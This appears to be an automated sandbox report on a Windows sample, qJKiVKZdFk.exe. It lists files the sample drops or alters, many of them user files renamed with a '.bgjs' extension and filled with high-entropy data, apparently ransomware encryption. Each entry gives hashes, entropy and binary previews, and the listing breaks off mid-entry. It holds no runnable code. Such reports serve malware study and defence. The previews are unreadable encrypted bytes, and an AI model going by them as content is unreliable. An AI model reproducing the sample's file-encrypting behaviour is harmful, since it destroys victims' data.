                                                                                                                                      Preview:ZUYYD.%..:..r^.1....-...@..=T...m.....3.x."..xc}..ui.<.0M\..=5....S....i..C!..h.d.jQ.6.....c.b.v.O).|..+......w..A..@.w.)..A.0.;#M..p...0..E.r^.'.7.n.'...Y.O..;..5.AL1....1......{...*`o...=.m...Z....J$J .F...Gb<u....n.z......U..p.E;.\..R)M.....X. .D\...Q...I...+... M_8v..@...>...6..3..3..v.7...fJ...g...".W...k.....~..;...'...@.X.......s.~.YR...cqU...t0.5...z.t..U..rL.......C.>.....X:.........N.0.H..#:.{^.m.{.H..mH....A.I..h}..J.........~...;._.H.7r."......C.*..v.15b{m...@8..+..O....?Vk2S!...A.6..!..a...z$...*}.B.,.-k.ZTLQ?..)+..%m...9..G....yVY.....\.AhI.5..;Y!..7.....)D.bR.....M. }....x.......d.8...b3.>R.4.)....@....Q\.l.!p.V=P..lY...............#.]...0.....M.;?.1'H.6)M.*c..10..E..a2...b}..u.q%.U.F|...*.[<.....|........&KV..V......[.C.....v......'b..q5.?.W....x.............an.0...Oy..<...D.a..)Hk..o.#......:fl..pZ./...D4....=S....s...F.......iw.4.z=I...R?...h.`......T....W%.@?.4!.?!.}.9,Nc.......v3.).5..`.O.G.j.+.r.t.+u..7|...H..

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZUYYDJDFVF.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.847323927615213
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:iCwpwbDIUXCza2/ni69hCmF7zFewfcosYQT15NRhGPbD:iN2XIMCO2l9h17QQxC1FqD
                                                                                                                                      MD5:7CFE11402ED74841B06326B152C2DC7D
                                                                                                                                      SHA1:B0FEC80D6E48BBEEC7E06D6CC997487404254935
                                                                                                                                      SHA-256:B515F3BC9D31079AF3D162A0F543B221EB8617CA6B6CE68875DB320EF4D2A3EE
                                                                                                                                      SHA-512:56F7C913E1C90CDBDB8F6B4C3CAD217965FABBBA33415A8BDCE29F7785BCDC2644F4BEAA4D41AD6612D82D417E34A6F0778881DDB10FD06C8B23D2A3F3C94471
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZUYYD)p!.-xa..W..=9..Io<=..y.......7.cY]......i..+.=.....r.....Sh.t...efN..m..5. E.......v...nt$p5\.\....J.i..7~...I.....\.:A>........?...|+"...&0..JE..u>].T..p...dY..u...p1...n...S.Y....a...hk......#..P Pi.2Nhw.../...:/..%..Y.......@7..Jb....5..=v.ea....{I.|.H..gG..ec..&w..L...uW.d..2....H.P......2.....r("...IgL9Y-.t........J..z.m.o.5!..v..3..'k8...../...+`wL......~.........5.W.H?.7.....R.~..px.;.G.{J..=5........-.'...G..q.P...._......!/...q..]...T..'.t.m.&...|.......g....xJ-..x...F:..~t.Z!>.vF..t.@...Q....Gp...B... ..qk...I....K..o..*.,X..i...H\v...@|v.... .Y"t.]K.....,U=....B)?....R.....<..........H..9....h.O{-.)N..w..7..-f...e...pl.(.....u(......G..z..h.-.]ED1...S.G`2...l0..SN.dx..Q/.=.\B.".....Y...w../"rPC.R%h-.E.oo..3.V..b&..8V..o..T.G\...-._W.:.......0.....~...M.....+....(.SuMO.buP......M.t.N`[.}..vB.Y.Y.`.HV.MB...l.y&]...J....T.c...kAZ...z$<I%..>-.P.c.l..f..RO.......Z.R.U4.e-*......i....r.'.^.l....9...I....w...U......&G.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1383
                                                                                                                                      Entropy (8bit):7.851679443943104
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rEHDk7yq4UZDFmzrgydtWeT+0fsRz4oaHQLJWFsV8S/B9fAE9X11huHIOmbD:UqjZZmPtf9+w8zWHFsV8GLB11h+10D
                                                                                                                                      MD5:235F27C05B3CCA5AEC383786FD2CE4D1
                                                                                                                                      SHA1:8D1087157CDAACFA335220E4C37B68465D9EEBEA
                                                                                                                                      SHA-256:95A463627C68810E3E2D4B93240E1D847EF6295FE46369D51EB5D463649DBF0E
                                                                                                                                      SHA-512:CA4DD0EA41DC717DCCE318860BEAE5C46F3CE6667849F365BAAF528815F8226ED9CACEF1C045F11C09AD178F314A1150D8E9C0AEE1BB2B53514918BF3BBE6FE8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L....{%.v.^B......^.(..tc7.. .]...mi..)`..9.e(....G.u}.!t..e1...X ......*.$.5../.*k@Q+.X...J.9u....h..(.O.:...\..+.....z..dGpb.....oV..#..C....N=z...Q....X.`].q2=.Eu..".SZ.t...<#..G....@......s<E...}.4.1I.@.(..1.(...2..!.K...YI"Na...hpxu.g{1'....92.X._.....u.~].O.R...Ap.u..Kve3p..m.c...['.X....}.....1...F...A..e(.r....M...U..O...p..}.....L.|.'...6.'.)l|..>...T+xN.VeeF...nf...x...^?'..... .../.6._...?.@%.<..\.f...-U.u...f......T.G$B#.......B.?QZ7rG..r.j...c..~,.0....1.T......T.......m..x5.5...>....fP....R..L.?.=.!r.%.rB..L.. p.......0..@./O..b5.s..T.....6.$.k....-.'..+.>....Bmr..9..]....2mP$A[:..m......aHb...,...........4f.....W.W..Zk.=........FK.Q...M.a........q.{....H..m.~.Hf........j....)...}%.n~...?C.../0.W....V..fh.u.....N/D3B...z.!..2.*_...!.b.....m*.l!....R.{....W..+...~...%A.n..k.@..}.6.L......8[.Cv.M..1N*F..rl.1.*J.R:.b.^u#[l..S.U.....\.;K....o\*Q.tO.J...i..G1.)..H...0~.A..'...s.......>~ .K..fK...(8|^..RS.../...w.J?..r{....,.U.:....{....=.>R.

                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):341
                                                                                                                                      Entropy (8bit):7.316253728316204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:oN6lx32lefwkrBJn/7URA4nZ8mUpoezK9L8VozloOMmQrIXuG3ukIcii96Z:oqzRrBJ7U1nUWL5zJMDrI+mukIcii9a
                                                                                                                                      MD5:CB44211D6D112BE40070B682C7A78869
                                                                                                                                      SHA1:6B3F146760E55EBB01622F6024152542B00E9C3B
                                                                                                                                      SHA-256:8E8F3BC713B2B693415173D971813778715E4495D2E13E958DA31A59A05FF952
                                                                                                                                      SHA-512:49F8B828592E5468935B4DC4EAE8C69237B97B70BE9F87124D281489D91905C79B2EAE2991795B2C57EEEBA94F40D4B7A8361D51235B47877F9E2EDF8FF31932
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:deskt..%....Pk..%.tWK*.H....x^...8.?2..=.R.....^..$%.........9..8.<...x....V.Z.N.]...=.)..R^.......x. .`P..c2..l.........3..<kh.g/|t...^;...^P..I0.w#C.@B.....1..).G..K1...R...q...7.;~....(Y..7!6n.&.?.......%..\/[.y...n...4...{.,=.TUW..Qr^;.+......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Application Data\.curlrc.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):342
                                                                                                                                      Entropy (8bit):7.250814412714499
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:KW5mfonfEkUIryeAnsGWnO8XikDcwCIc6mc0JxyJBh7PPBkck33ukIcii96Z:N54onrrypxWnOnknVmxJxQBVPPBYnuk6
                                                                                                                                      MD5:35CD5D4F509D6A98D9768FF2E9B325BF
                                                                                                                                      SHA1:1E7FCFD85A17828435D8E92A6B9BEE2B6040A365
                                                                                                                                      SHA-256:CBBC95535994ABDC3EEAD01F60002B6E17FEAAD8D9417D4971F597E7F9B02D56
                                                                                                                                      SHA-512:952BA76D6D7A7EC16EAD0FC1C9EF15890602528EBF4610361A078A6096614614B47188C16EB729728AE8916C99B585E095E08519FA29B347910E797469603E6D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:insecO8i|./...Q.a'A2.)p..&...d.!.....L.B..+Q..CG._e..U*..^...[-[Z....x.I..fSv\...{.T.(..].+...z......J..i....Y.Ghn.........~..t.j...i+..-](....-..B....Ky'%<.I..y.....;M..w.._..}.i......T~.....V..lDk.1.Z9KCu....B...7A..-.P...S...;.x'i%.))..9.9..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Application Data\Adobe\Acrobat\DC\TMDocs.sav.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):370
                                                                                                                                      Entropy (8bit):7.3038014539179015
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:+BZi9iQ9GrGwtjeU35AdAVzqKuzsQRj2B9QW/j0tL9Y2LVYzN33ukIcii96Z:2ZjQsrRYU35MA4KQpRiJ/cbxYhnukIcq
                                                                                                                                      MD5:68B694062AE7F5CF9A03ADFC9442F05F
                                                                                                                                      SHA1:F521D34DB6B86DED4162A25E8AA0E27A082D5CDC
                                                                                                                                      SHA-256:C523CB4244B1DFF3EEB342ABAB4C4C5DA0D28B0CD3E45E5E7EA05C0DC156C7A3
                                                                                                                                      SHA-512:D059175F4FC8D668E3B5A8C29A550E10475BB74CBF160D0A30A9C1E196C874252A109A9CC771E86E9F48503B9599C19830F6C14D0AB76758770EA45FBE9EFA9B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%PDFT...g..S.=G...v6..X.\.2..uF...HO.hF.f.A.x.%......\...4..M5GD..!u..cM#....Q.}......o.j6q.=:Q.}.I.>p.:.Ca....d...d...y..v..DRo...q..cs.|R.k.../..y{TF.o..)f..T....._^.....b.`...S.l..........[......^...&}...T.JQ;......k.8..<8..;.0-K.;Ux.r.~..Nx\......_..P..G;.S...... ...CkghPy...rtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Application Data\Adobe\Acrobat\DC\TMGrpPrm.sav.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.361231835910501
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:gqXVaWdKdQyqZZ8VwvEvlgZYwJduukIcii9a:gCKdQpZZ8VwvmgKwJdJbD
                                                                                                                                      MD5:226907008D61C25B68E0417DB07EC338
                                                                                                                                      SHA1:3A6B6B4B9C98C2E1443D0A83C8D532AE694EA813
                                                                                                                                      SHA-256:3E4568C616D615DD4203CAF34C42288B458AE7CEC14D752EFB88B9C8C1F550FD
                                                                                                                                      SHA-512:022DA823076A6C88C7B78E314381BA3EDE572CFBFF85DBFAE970FB090322A2EA0EA50BB5C1B6E2E441C72D7F3CBACF55CBF63F5FF44382382253B8F1263BDD3F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%PDFT...{ ...Ld....L..@..T..~.....a..]u.h..L. ....O....U/....r....`.........`.!Ny,.6..rsT..3..zvp..........b.N.,./w.')....mJ....U..Oq..A......7....Ht.7{<.......JZ..P70V'.+Z..d].=X....._mEh....u.."..V..L...Ot~...Ja....|...X..P.6.|..0.:..w.xM. .|W|.a.u.,:..(....j.5....a.....D.@}}..x._.k..L...O.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1352
                                                                                                                                      Entropy (8bit):7.841467899239169
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:CRV9jePKk7Getx3ntPEv2TXVmqB8mhigmKWnHWEqefJl8qEJRQGP+hlf+NbD:ojeP96eb3tMsXVV8i7MnH/qYaJlef+tD
                                                                                                                                      MD5:6B721C52552E9244A3A96D1D3B5493AC
                                                                                                                                      SHA1:4BF5868034C9B56D3ADCD6964A420A8912FC3E85
                                                                                                                                      SHA-256:A7FD60D31D14F476964D12AAFCC90BD1091B140A9BC2630FAC4DDE0C8821A2F3
                                                                                                                                      SHA-512:E857B44C1B9577D3F116F3CB5A7E71C792AB5142F94CC8148BABF78FC0B4C4165972CAF2EA7AAC0842B44903B212B65018E1DBC9C82AF43E4FB50BF2C26B1D4A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...**......}.e+q...;...Z{.I.!..n.jB..Z..+vA=.r...I.}.=....%/.../c.K.5.8@.'.,.J..y.8.;XE.-JSGW.....S.....V....2z...&..,.7..p.U.x9.....*.6......@.O...I....../..-I.9.$. 1..y......mO+....LR.. Q....8^.f..r.u.l.....,..+...!.#..zM.....9c.(BF......As7..T...a^. .n.,.H.!3uk.\..{...}.*...C..h.5.m.a.r\..'.b........@.....~.4..lg..p.p.m..?.R%......%.l..@..N..:i.P.J;...[#Mg....V..P..\......MD.#.C8$..p...n...2....#2.DH..S....|S...........1......6EO...G+.j$..#...d...>h.....d..,.1.......3..JV.....-..hu .kR....h{\v.kx*1.J.f[4../`..F...e.."...<.^.u.W..-/\...![/.....M=.@+.:......G.s....K.9.DO.2L-....).*.....A..)..J[..-:.....u..&].[w...^....U..<...}~.T....].,...o..a*...t..0...q..I. ..8..3.7.}f.E....a......>.h..q.....9.7....D.....X/Zxzpb+..s<..c-......E..3@.8..{.....}..^.^7..|@}.Ju....d...O...I.,.k.0...R.).......QTxA]\f=!..c?...wn....x.oVx...K......."0..+....X+..!.%yb...MY..-....Z.0.K!1..T..*...:.y.Uk:A.J1o.......T...Jj?....._.s{.Z.1..60...

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2445
                                                                                                                                      Entropy (8bit):7.916776932112177
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Qo51G/4g1/srjHiRy/KCxkq0ZGbWKS8xBEhV8LMiADMsNRWnD:k310rT8yahZGbWz8E8LfqZa
                                                                                                                                      MD5:E8D9CEF39D2D3B32A1244E32ACF615B8
                                                                                                                                      SHA1:1A9FF277EFCF41B0BE9E29085A15EE8B7673ECE7
                                                                                                                                      SHA-256:5586FEF7D763FBA9DB356913C5AE3C80829D85173857485C847C5970BEDBFDF1
                                                                                                                                      SHA-512:67F64EEFB98950277AD97F55AB79E303572D3A939BCFA2C843F8B5D4AD0019FC206F9995ABD0562E18CE2FBD2AD05A3425C0CCBC1972587BC5E77356E9B85BB1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmltZt.....v1....)s........cw&.l....x.(%......Xo.......M.P.c|.#.."6......+.{...ux..>.....=.Rg8S.,..Eo6.8.i...R.....1.....?M...Ox:$...p..N..?WK4..P.X."MA~+.......a8*.7..-.z.....d.~..@.o..vxs.r.X....O...JU|..3:....o-......>..t.A....J.].,".......8.a5...Rnv...'.].o..p[...G7...$...uW.D#^a.o....F....(.w...0A.v...Sk.Uy.[+P.?d.d2(..E..!..Y.4...a.q...Dk.j....e\.?..........._.........+..+..i..O....}.5(....le...o..."4.$l.7...wR..da2..R.m...yF.......j.U.5.Os....c ...8..S.......k.TOR..<..22}...d..=x....FI9...S....R........l...\......~c..Y....Pa.ea..P.G.........?}W.u.....*...Y._y...9...._0.E_. O.....'.0o...u..F..!......w.%..X....D..M..9......Q.a..X..6.....6...h..Y.*.....7.....N.$..-.2.e..:......r.l...L,......RQx..cS..z;.YI....@T.(.*.........X.G.dZ+eM.L......o.1;.o..{|...A..b...C..1..]..../....j....h......e=...........Jv.?s.....ET....k.co."+..aAr.P.#...)hN.z<....}o..n.....Ep.RA..b....t....9..~.iR%..o~l..9..R.:...~J...{.{.ukw.<.GR.P|h=......|.&.$.O.{.<

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2402
                                                                                                                                      Entropy (8bit):7.92097144791001
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:VK9lHC59c0fg3sOnv/D/svWo8hnZJRBUErWkaqnBD:VK9U9c0POv/DU+nD8s17p
                                                                                                                                      MD5:6CD209DA8CD45CB673F2C5F08F29F912
                                                                                                                                      SHA1:247DCEF95284146376AACF8B38D537D418999AE7
                                                                                                                                      SHA-256:5F0CBB3E4C3FB9553CB4662043214399BE64628CF5ED902FA61198FFBAD7DF01
                                                                                                                                      SHA-512:EEE53359E28BAC6A9FF7AD809347B4700F3E499CD2AF3383B9FF12BD1B5E3C59933DEC1974E430BE4E41F22A7FA5A2D522CD894C9BC50985AD790EEA1B335013
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml........NF.......9.X.......8..u...:}.....e...o....O..6\t.Lf..8A....Y.Qs..`q..E........c.....f.`?....d...u|~Z..B.......\C.A._...[.'...T..fA.<D.*.EF.H.7.....z....?v..m../.S.a'.a.z.Ztv. .....%......GL........m..........R...7..u.Y.&I.=.$.$..'..LMi.G....(A.7.P...G.....`F=?9*{.+d........K..X.=.=.9.,.##q].I..E..........8..."...O..@.\;'2.`y...I.L....1.*\c.5..z......be...W>....-:...}.j....._Xa`..bPvOu.u..R....|...H1).(.&....Z!.a.F@1H.fb.....f...p...7..6..Y..{...=<...s.;.....M...?#.....-...pB......H.cj..Y...$..7_...s..<...kM..k.q.G.S...1....D..da~.......|.8xT..t...wP....(Q.._....).3..K.(...*.....'|/...N ..$.....'q..4.:..6H......r...?....o.}D...v..A.>..2..J........tD.+..C....>.........Q...'........y..9k6.H.cN.....q.....!Q.'..HJ.]...%'".l.<.<F....S`'.-.*...8.rF...........&.2P..$...T..\....9W.K...z{....NW..Xp...F.I.I:f....9..C......l......O........t.y .}..[......V.]..io...x.6a....O.b.O........c...CHH|.`..d.C...|.Z......p...;.../lX.{...].L.o\=2

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2420
                                                                                                                                      Entropy (8bit):7.918888737535357
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6kMNNPlcqlYQOqNTtIPvjMPmTP3pY8UwzudkiwrD:/mGwXNGjM+TP3plUQudwH
                                                                                                                                      MD5:12E1AF369BB6E8990026518A98469B1B
                                                                                                                                      SHA1:433AED0C2D0AB11E275B8C9DD1FD32D2DE7D1025
                                                                                                                                      SHA-256:8F90F7CFB78D6D549D6457CA835D2468D8B4B2E052D74462597D3416B25A67BB
                                                                                                                                      SHA-512:851436F378D0002BAB4F5519F4F77660A8B6D03CE7B3DFE34DDFBEC9DDDA8CF06CEF28FE1170008087D92728BD56CF8D654554BF4213AAA1C462EEE568DC7EEF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..X_....O.-.....Q\E.K...A....U....[.c,x.9...z..]....&..34;.[E/... .=m..\......Zg.T........uqR..8E]V6.'7...H#..l.:M.....gS../..}h_..$J...T.lz......X$.>.r.P....7...c.Z...f.#....Ip...!...q.....n..E.].~..>../."Z.f..........a.....2.=..h9,..C.T. .c.j...V..P....i....N6.q.,..Q.`*$.h....5.F...^}..Y..P.v....T6..$.e.r..v,.!b..l4=4......&.k.....4kU.e.O..k.{.-.'....-.0...I.4D...##....g.......j45....n.[......|.z..k..........1K.tn.....@'..9=pp.(].......=l....q...[..|.y^..$M..o....U.~f.t..hHe,V..#V1H............@......O..O.x._. a.......0..x7.....w.g.g...,....!y.J.....~.y...(`b..&Sc.5..ySBU|>.e....n^,. ..On..n........a..F.y..q...W.0........."..7..x...Cz.#.v.a.465....?..+..^.;.a....O..#..k....2XW..F..0.~5YN....s....|3.Q..V~.|....../*.pgy.v.up.....ib.6..6!ue..x.R.>....P?p..k.J..{.....d./.....D.o..YD...5.F.|*....)..u.`.'.....+yf..42.0...`.%.....f8..v.H.p....$U.......k.j..^....'...K3."...VC'.Z..`..q.o..x......H._@......C.N.x$e.W..^.......?.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\SavedPictures.library-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1358
                                                                                                                                      Entropy (8bit):7.86253269348577
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:u+6La3bb5rKxL30ECOoQX1yf8Px+f3gxNw14A5V1SLY2jfM9O4DoH67wJv0AcSMX:mOxr4QhOXFyfBfQxqKxjkHgY/D
                                                                                                                                      MD5:0EAB81D7D978E6D04DA5BC983BC0800F
                                                                                                                                      SHA1:9E6A80164CE4634A38805C13A8A5542200F4FBF6
                                                                                                                                      SHA-256:0F68CD96C6611438D8B2B1CCB087E91060E662F6335D0358505CB120CCAF4CC9
                                                                                                                                      SHA-512:0FA2BC5441E50EA325F8D21FD0DA04D266402EB1A5C552F92027E4DB805322BDCE776391C2A8E134E0C6E17915C4369DF82D58F6BB7A02DB672CBDBCEE29D5DB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlC~...,....C...hjE.ov.t.....^...=.]|..q0."..F...?v..j.b.>a<.T.-H{[.....pZ..0J..o.s.........s.x`...[E .U"..0q.....k]..@....'.W..4..3,...+.r........|.>f..9.%...0$=.*g.n.......k.I.!W..I.~...r..=:7.qq!e..I\.R;E...-w..@.p..?..u.qx..^..Q._ '....m..... .8.=k;$..T..x..2. ..^.R....@....d1./4.........F.....4K.~..R..).8J^...@..!.....Y!./m.s7.k..`...=..}.#.=S....B...W.6.Q6..../v;.I~.cv......}2..Rm.$...[.u.#. .r.'...Q|..T....P...zw....u.jM<|g.....F. ...A..........\...w...Qe7&.X.U....*..n0..p.i8.EK....p.h"..u...K!.[.r.k.c.%!%...f.!....w....D.h'*..X@......y.DZ..=Z.d.0..S..-~..c..#.lSDx. ]..9...Z.q:..0.....)...f...f.s......#/$...@=....aq.).8....Q.....u.Z#.~..%...N.& l.....}..K.d....a>......... ...._....'.%....9.U.h.~.1.t....M.....+...........>U...V77&3H......`a..s.h5H.=...H..H.z.6.Yy..H.@X@...i.x}.82..c.U.9.0U.:...z.6.....+q..!/#.1G........_I...i.kv........W.J.7.p...7....!....q.......w..r.s.....&..1.....7...._......eA.T.O&l..B....](..ka.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2430
                                                                                                                                      Entropy (8bit):7.9271618336542495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:0qrLVsHQXCeaxoRH7WYODdBN1AKzr3QIVue4st2xRRJ9nEA8xyg/z1D:0q2HQSxm7PODF1A8zv9xtGJ9n6kg/x
                                                                                                                                      MD5:41553A8723D2D519B34C77593C78ABA5
                                                                                                                                      SHA1:74ED26340C7B11602D1B701967725E9E7B0284CC
                                                                                                                                      SHA-256:E38E3E5D5B9637C937E6FBC7F204F5C9F3FCCD310EBA8D2C982C195F502F9346
                                                                                                                                      SHA-512:7B80DC009A5F12DFF579E9B13B84EBF045B265A86CC8C5EA681A3F8617DCB35D8DF7769CB21B6DFD15FA48E600E1281B512179434BBD32FCD213CB79C2784B66
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.{.i.L...@(Z.%F.o)oj...?.C6.c...h....I}..X.gA...[...]...0.D.V......dlt......A../Zc....?.....m.Or......g.;;..u.L..).H..WX......g.X.k....~.<8.l....a....45TJ|..&...........D.o~.l.Zf.<.,F...-...4cC........=...`-.$\...1*'...`8.h/<.FIGL...'...V'Tf.X..P!..Q[.T......}"....{...}I~..j.8{.+/..C#2.0S*..n.........!9.R."...r.x.3v.glk...a.]*5.*./.#....n.........9K.<h.f...&...6.T.:Z^V ...........v...$.z:..D..p........j.i..'....r......_9........Q..)1!&".&c}.'x.v.JY..Bk./t..{.pp..6....f..o<u......^..,a0R.!.........S......C...m.AM.RC.U.L....lr.........\Lg....P.e.X....S.`....@Av!=]`#...z+*.#..O....Qp...y....W.6.fE#c]f..[...1.....I...]..I.o....k{M....x.o.h.........-nZ..$....o..j9k......d.6...T..?F...|MQ{...Z+e.(.2../uc....x[t$.T..Q<.Q.;...).V.J.3....N...Fe.CB_";L6.M..G8`.b....r).9.8.&^c*.i.....kuD.......2 7.D.~H.fo..b.^...<4..#5..Q..m.d...Im....+..br.,........P.@O........P.O...;...sd'bh_&.+.M..0.@.~.=..;...<..U........Q.....<w..._.v.O.R.-.]+"?.>..~.L.fM

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\CZQKSDDMWR.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.834402126488088
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:qXb/iZ7kVBnPWnrxZE4lsgjx2XP2Ppj/DwrN7idRU4Bajj8wwFZg2Fpia7lrpinm:qXb/iZUBnPkNZEtGk2BbDw8d5Fd6UiaT
                                                                                                                                      MD5:E9AE5D731657FF300E305C5A909D787A
                                                                                                                                      SHA1:4333D738D0A29B66C5857FA9A5D4C81E87BA8F71
                                                                                                                                      SHA-256:0137C66A020184F8FE5E8DEC5437DE344EC2428972030DD113025B4E5FFA4C51
                                                                                                                                      SHA-512:CAFB6DE1F2700A8AB6A2BA3D7F48F6A9F00B0E9BFF0A88AFD18EE16A4F82D8C6A67A0C9B041ED57E6916D0122653A7B2A94829E90D4146DC9CB757599A478A99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS..{]...w?AY..\...i.%..gcn&v.R.S......}..c..T.D...W..h.M....y...7.b.{..Q....Ed...g.Z?;..."..........<....Z..>^\.\..m..Wi".O5....S....~..K.2..X7O.J...je].[.o.....0Vt.edn.....u8z..._...!r......3.+.....q.8......,Z.G.]v...EBH.i..H.........T.!..i..Zz.V.g.... O.....N..4.[2(O.Z.#.....x.....iY.%DR._..3Sc...k.<..W.`..Og.*./ELe...&.5.6..p.&/B......d..m..b.(7K7,'h.| .d..,~..].Ut....4?Q.u......Y.>. .p...^%.E....V....}H........N.@...r.....cn..~...4.T...o.D.......U.Jr&z.Z.T.... ...f.:.7....)..C....)....Jn..L..)...m.*...j .......".~...-..t.*l....+.....U..0...N..\Y|.f.....V.S........b..D.A9m..{o.Q..Q...{]...A...M:.\..e.dM.s_.U\....z_a.+.l][CJ.j].p..... ....V|...w&Z.a..T.#E.ex.D..utn..Y.u......%P`?..&.B:K!.[..j`.c..D.../....A.Rq.1^;t;@..._.H[..R....(.]..C.9\r...j.x..L...S ...qm.......j........a..B.14...".R.xp$.P.x......w...b*4f]..K.ED...[...."n'..T..9LI.Oa@..%.....;Y%...N.e...x...,5m.....o......`.*U.kq.nl|..B..U&.....7..9m.mN...F.#...9'..D..2

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DBIQSSCSZX.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.845788218325389
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uS+uDF00hZJHlcqs5tlqYWyleq8pVVIVQC2AQXtD9rXYXyNndoNHbD:uStD/ZdW9kwd8pVVIv29b59A7D
                                                                                                                                      MD5:2CC5FB2AC80C5CF6DF668EA8394C53CE
                                                                                                                                      SHA1:2B0AFA16C00C21B53CFEB7039A66F7CA035429E4
